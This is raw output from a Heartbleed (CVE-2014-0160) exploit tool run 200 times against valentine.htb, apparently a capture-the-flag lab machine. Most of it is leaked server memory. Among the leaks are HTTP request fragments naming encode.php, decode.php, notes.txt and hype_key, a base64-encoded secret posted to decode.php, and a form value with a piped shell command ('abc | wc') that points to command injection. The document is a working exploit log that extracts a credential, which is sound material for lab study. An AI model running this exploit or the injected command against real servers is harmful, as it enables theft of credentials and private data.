
defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)

##################################################################
Connecting to: valentine.htb:443, 200 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0

WARNING: valentine.htb:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 1 of 200Please wait... connection attempt 2 of 200Please wait... connection attempt 3 of 200Please wait... connection attempt 4 of 200Please wait... connection attempt 5 of 200Please wait... connection attempt 6 of 200Please wait... connection attempt 7 of 200Please wait... connection attempt 8 of 200Please wait... connection attempt 9 of 200Please wait... connection attempt 10 of 200Please wait... connection attempt 11 of 200Please wait... connection attempt 12 of 200Please wait... connection attempt 13 of 200Please wait... connection attempt 14 of 200Please wait... connection attempt 15 of 200Please wait... connection attempt 16 of 200Please wait... connection attempt 17 of 200Please wait... connection attempt 18 of 200Please wait... connection attempt 19 of 200Please wait... connection attempt 20 of 200Please wait... connection attempt 21 of 200Please wait... connection attempt 22 of 200Please wait... connection attempt 23 of 200Please wait... connection attempt 24 of 200Please wait... connection attempt 25 of 200Please wait... connection attempt 26 of 200Please wait... connection attempt 27 of 200Please wait... connection attempt 28 of 200Please wait... connection attempt 29 of 200Please wait... connection attempt 30 of 200Please wait... connection attempt 31 of 200Please wait... connection attempt 32 of 200Please wait... connection attempt 33 of 200Please wait... connection attempt 34 of 200Please wait... connection attempt 35 of 200Please wait... connection attempt 36 of 200Please wait... connection attempt 37 of 200Please wait... connection attempt 38 of 200Please wait... connection attempt 39 of 200Please wait... connection attempt 40 of 200Please wait... connection attempt 41 of 200Please wait... connection attempt 42 of 200Please wait... connection attempt 43 of 200Please wait... connection attempt 44 of 200Please wait... connection attempt 45 of 200Please wait... connection attempt 46 of 200Please wait... connection attempt 47 of 200Please wait... connection attempt 48 of 200Please wait... connection attempt 49 of 200Please wait... connection attempt 50 of 200Please wait... connection attempt 51 of 200Please wait... connection attempt 52 of 200Please wait... connection attempt 53 of 200Please wait... connection attempt 54 of 200Please wait... connection attempt 55 of 200Please wait... connection attempt 56 of 200Please wait... connection attempt 57 of 200Please wait... connection attempt 58 of 200Please wait... connection attempt 59 of 200Please wait... connection attempt 60 of 200Please wait... connection attempt 61 of 200Please wait... connection attempt 62 of 200Please wait... connection attempt 63 of 200Please wait... connection attempt 64 of 200Please wait... connection attempt 65 of 200Please wait... connection attempt 66 of 200Please wait... connection attempt 67 of 200Please wait... connection attempt 68 of 200Please wait... connection attempt 69 of 200Please wait... connection attempt 70 of 200Please wait... connection attempt 71 of 200Please wait... connection attempt 72 of 200Please wait... connection attempt 73 of 200Please wait... connection attempt 74 of 200Please wait... connection attempt 75 of 200Please wait... connection attempt 76 of 200Please wait... connection attempt 77 of 200Please wait... connection attempt 78 of 200Please wait... connection attempt 79 of 200Please wait... connection attempt 80 of 200Please wait... connection attempt 81 of 200Please wait... connection attempt 82 of 200Please wait... connection attempt 83 of 200Please wait... connection attempt 84 of 200Please wait... connection attempt 85 of 200Please wait... connection attempt 86 of 200Please wait... connection attempt 87 of 200Please wait... connection attempt 88 of 200Please wait... connection attempt 89 of 200Please wait... connection attempt 90 of 200Please wait... connection attempt 91 of 200Please wait... connection attempt 92 of 200Please wait... connection attempt 93 of 200Please wait... connection attempt 94 of 200Please wait... connection attempt 95 of 200Please wait... connection attempt 96 of 200Please wait... connection attempt 97 of 200Please wait... connection attempt 98 of 200Please wait... connection attempt 99 of 200Please wait... connection attempt 100 of 200Please wait... connection attempt 101 of 200Please wait... connection attempt 102 of 200Please wait... connection attempt 103 of 200Please wait... connection attempt 104 of 200Please wait... connection attempt 105 of 200Please wait... connection attempt 106 of 200Please wait... connection attempt 107 of 200Please wait... connection attempt 108 of 200Please wait... connection attempt 109 of 200Please wait... connection attempt 110 of 200Please wait... connection attempt 111 of 200Please wait... connection attempt 112 of 200Please wait... connection attempt 113 of 200Please wait... connection attempt 114 of 200Please wait... connection attempt 115 of 200Please wait... connection attempt 116 of 200Please wait... connection attempt 117 of 200Please wait... connection attempt 118 of 200Please wait... connection attempt 119 of 200Please wait... connection attempt 120 of 200Please wait... connection attempt 121 of 200Please wait... connection attempt 122 of 200Please wait... connection attempt 123 of 200Please wait... connection attempt 124 of 200Please wait... connection attempt 125 of 200Please wait... connection attempt 126 of 200Please wait... connection attempt 127 of 200Please wait... connection attempt 128 of 200Please wait... connection attempt 129 of 200Please wait... connection attempt 130 of 200Please wait... connection attempt 131 of 200Please wait... connection attempt 132 of 200Please wait... connection attempt 133 of 200Please wait... connection attempt 134 of 200Please wait... connection attempt 135 of 200Please wait... connection attempt 136 of 200Please wait... connection attempt 137 of 200Please wait... connection attempt 138 of 200Please wait... connection attempt 139 of 200Please wait... connection attempt 140 of 200Please wait... connection attempt 141 of 200Please wait... connection attempt 142 of 200Please wait... connection attempt 143 of 200Please wait... connection attempt 144 of 200Please wait... connection attempt 145 of 200Please wait... connection attempt 146 of 200Please wait... connection attempt 147 of 200Please wait... connection attempt 148 of 200Please wait... connection attempt 149 of 200Please wait... connection attempt 150 of 200Please wait... connection attempt 151 of 200Please wait... connection attempt 152 of 200Please wait... connection attempt 153 of 200Please wait... connection attempt 154 of 200Please wait... connection attempt 155 of 200Please wait... connection attempt 156 of 200Please wait... connection attempt 157 of 200Please wait... connection attempt 158 of 200Please wait... connection attempt 159 of 200Please wait... connection attempt 160 of 200Please wait... connection attempt 161 of 200Please wait... connection attempt 162 of 200Please wait... connection attempt 163 of 200Please wait... connection attempt 164 of 200Please wait... connection attempt 165 of 200Please wait... connection attempt 166 of 200Please wait... connection attempt 167 of 200Please wait... connection attempt 168 of 200Please wait... connection attempt 169 of 200Please wait... connection attempt 170 of 200Please wait... connection attempt 171 of 200Please wait... connection attempt 172 of 200Please wait... connection attempt 173 of 200Please wait... connection attempt 174 of 200Please wait... connection attempt 175 of 200Please wait... connection attempt 176 of 200Please wait... connection attempt 177 of 200Please wait... connection attempt 178 of 200Please wait... connection attempt 179 of 200Please wait... connection attempt 180 of 200Please wait... connection attempt 181 of 200Please wait... connection attempt 182 of 200Please wait... connection attempt 183 of 200Please wait... connection attempt 184 of 200Please wait... connection attempt 185 of 200Please wait... connection attempt 186 of 200Please wait... connection attempt 187 of 200Please wait... connection attempt 188 of 200Please wait... connection attempt 189 of 200Please wait... connection attempt 190 of 200Please wait... connection attempt 191 of 200Please wait... connection attempt 192 of 200Please wait... connection attempt 193 of 200Please wait... connection attempt 194 of 200Please wait... connection attempt 195 of 200Please wait... connection attempt 196 of 200Please wait... connection attempt 197 of 200Please wait... connection attempt 198 of 200Please wait... connection attempt 199 of 200Please wait... connection attempt 200 of 200
##################################################################

.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#p.......p...............X..........3............}&.........A.... ..notes.txt....|&.........}.............l.............. ..hype_key.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... $.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
..............................................mage/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9,en-US;q=0.8,en;q=0.7,ca;q=0.6

l|.&C
..c...=s$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......)..K..9`..9..U.J....D..h.A..\(..\kB..-N.|+...-tp...H.(..|.qI...U..:...k...C.....a.-o,...r#[.9...........................................h2.http/1.1uP.........
.
..................n$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
..............................................code.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

text=abc+%7C+wc.$~#...X7..}2i$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......ept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.10.10.79/encode.php
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

text=asdb..g..b..ty.z..q..~...#%y.......d....~...u...3g.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#........-5.........o.
.9._`N.q..C.)...|.y.:KX..^...}X..x.ZCPq.....et.....T....~A
....as..*dU..9...2.............................................h2.http/1.1uP.........
.
..................n.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......ept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.10.10.79/encode.php
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

text=asdb..g..b..ty.z..q..~...#%y.......d....~...u...3g.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#........-5.........o.
.9._`N.q..C.)...|.y.:KX..^...}X..x.ZCPq.....et.....T....~A
....as..*dU..9...2.............................................h2.http/1.1uP.........
.
..................n.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......q..........I.?.H...M...R4..H.Q.6./...0.r.i.G...........@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......q..........I.?.H...M...R4..H.Q.6./...0.r.i.G...........@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==N..3\)...~._c]..{.C.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
..............................................

8....)h..\.A<..z....h2.spdy/3.1.http/1.1.......................................z.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......

..../..p..Eyy.........5 ?...Y.N.....!..O.....,......@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
..............................................

8....)h..\.A<..z....h2.spdy/3.1.http/1.1.......................................z.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#p.......p...............X..........3............}&.........A.... ..notes.txt....|&.........}.............l.............. ..hype_key.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... $.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......pt: image/webp,image/apng,image/*,*/*;q=0.8
Referer: https://10.10.10.79/dev/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9,en-US;q=0.8,en;q=0.7,ca;q=0.6

..{.."...X;.......Cca;q=0.6

..|.4....\.j..R.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... .@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
................$.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#....................
...................................#.... $.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
